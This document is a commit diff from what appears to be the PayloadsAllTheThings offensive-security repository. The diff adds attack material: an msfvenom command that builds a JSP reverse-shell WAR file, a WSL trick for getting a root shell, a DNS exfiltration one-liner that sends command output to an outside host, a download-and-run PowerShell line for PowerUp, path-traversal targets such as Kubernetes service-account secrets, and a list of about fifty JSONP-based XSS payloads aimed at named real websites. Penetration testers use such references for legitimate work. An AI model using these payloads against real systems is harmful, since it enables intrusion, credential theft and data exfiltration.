Architecture - Files/Intruder/Images and README + template

File Inclusion - Path Traversal/Intruders/Web-files.txt

@@ -10,4 +10,5 @@ wp-admin.php
 /include/mysql.php
 /inc/mysql.php
 /sites/defaults/settings.php
-/phpmyadmin/changelog.php
+/phpmyadmin/changelog.php
+web.config

File Inclusion - Path Traversal/README.md

@@ -1,13 +1,16 @@
-# Local/Remote File Inclusion
+# File Inclusion - Path Traversal
 
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
+The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
+
 ## Summary
 
+* [Path Traversal](#path-traversal)
 * [Basic LFI](#basic-lfi)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper php://filter](l#wrapper-phpfilter)
+  * [Wrapper php://filter](#wrapper-phpfilter)
   * [Wrapper zip://](#wrapper-zip)
   * [Wrapper data://](#wrapper-data)
   * [Wrapper expect://](#wrapper-expect)
@@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 
+
+## Path Traversal
+
 Linux - Interesting files to check out :
 
 ```powershell
@@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 
+Other easy win files.
+
+```powershell
+/home/$USER/.bash_history
+/var/run/secrets/kubernetes.io/serviceaccount
+```
+
 ## Basic LFI
 
 ```powershell

Methodology and Resources/Network Discovery.md

@@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
 
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
+-sn : Disable port scanning. Host discovery only.
+-n : Never do DNS resolution
 ```
 
 * Basic NMAP

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea
 p.waitFor()
 ```
 
+### War
+
+```java
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
+strings reverse.war | grep jsp # in order to get the name of the file
+```
+
+
 ### Lua
 
 Linux only

Methodology and Resources/Windows - Privilege Escalation.md

@@ -1,7 +1,5 @@
 # Windows - Privilege Escalation
 
-Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
-
 ## Windows Version and Configuration
 
 ```powershell
@@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 
-### Password in unattend.xml
+### Passwords in unattend.xml
 
 Location of the unattend.xml files
 
@@ -167,7 +165,7 @@ Example content
 
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 
-## Processes Enum
+## Processes Enumeration
 
 What processes are running?
 
@@ -187,36 +185,32 @@ Do you have powershell magic?
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
 
-## Uploading / Downloading files
+## Using PowerSploit's PowerUp
 
-a wget using powershell
-
-```powershell
-powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
-```
-
-wget using bitsadmin (when powershell is not present)
-
-```powershell
-cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
-```
-
-now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
-
-```powershell
-%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
-```
-
-## Spot the weak service using PowerSploit's PowerUP
+Spot the weak service using PowerSploit's PowerUp
 
 ```powershell
 powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
 ```
 
+## Using Windows Subsystem for Linux (WSL)
+
+Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
+
+> With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
+
+```powershell
+wsl whoami
+./ubuntun1604.exe config --default-user root
+wsl whoami
+wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
+```
+
 ## Thanks to
 
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
-* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
+* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
+* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

Remote commands execution/README.md

@@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 
+```powershell
+$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
+```
+
 ## Thanks to
 
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)

SSRF injection/README.md

@@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```
 
-![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
 
 
 ## SSRF via URL Scheme

XSS injection/Intruders/jsonp_endpoint.txt

@@ -0,0 +1,54 @@
+#Google.com:
+"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
+"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
+"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
+"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
+#Blogger.com:
+"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
+#Yandex:
+"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
+"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
+#VK.com:
+"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
+#Marketo.com
+"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
+#AlibabaGroup:
+"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
+"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
+"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
+"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
+"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
+"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
+"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
+#Uber.com:
+"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
+#AOL/Yahoo
+"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
+"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
+"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
+"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
+"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
+"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
+"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
+#Twitter.com:
+"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
+"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
+"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
+#Others:
+"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
+"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
+"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
+"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
+"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
+"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
+"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
+"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
+"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
+"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
+"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
+"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
+#GoogleAPI's
+"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
+"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
+ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

XSS injection/README.md

@@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
 ```
 
+More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
+
 ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
 
 Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)

_template_vuln/README.md

@@ -0,0 +1,26 @@
+# Vulnerability Title
+
+> Vulnerability description - reference
+
+Tools:
+
+- [Tool name - description](https://example.com)
+
+## Summary
+
+* [Something](#something)
+* [Something](#something)
+  * [Subentry 1](#sub1)
+  * [Subentry 2](#sub2)
+
+## Something
+
+Quick explanation
+
+```powershell
+Exploit
+```
+
+## Reference
+
+- [Blog title - Author, Date](https://example.com)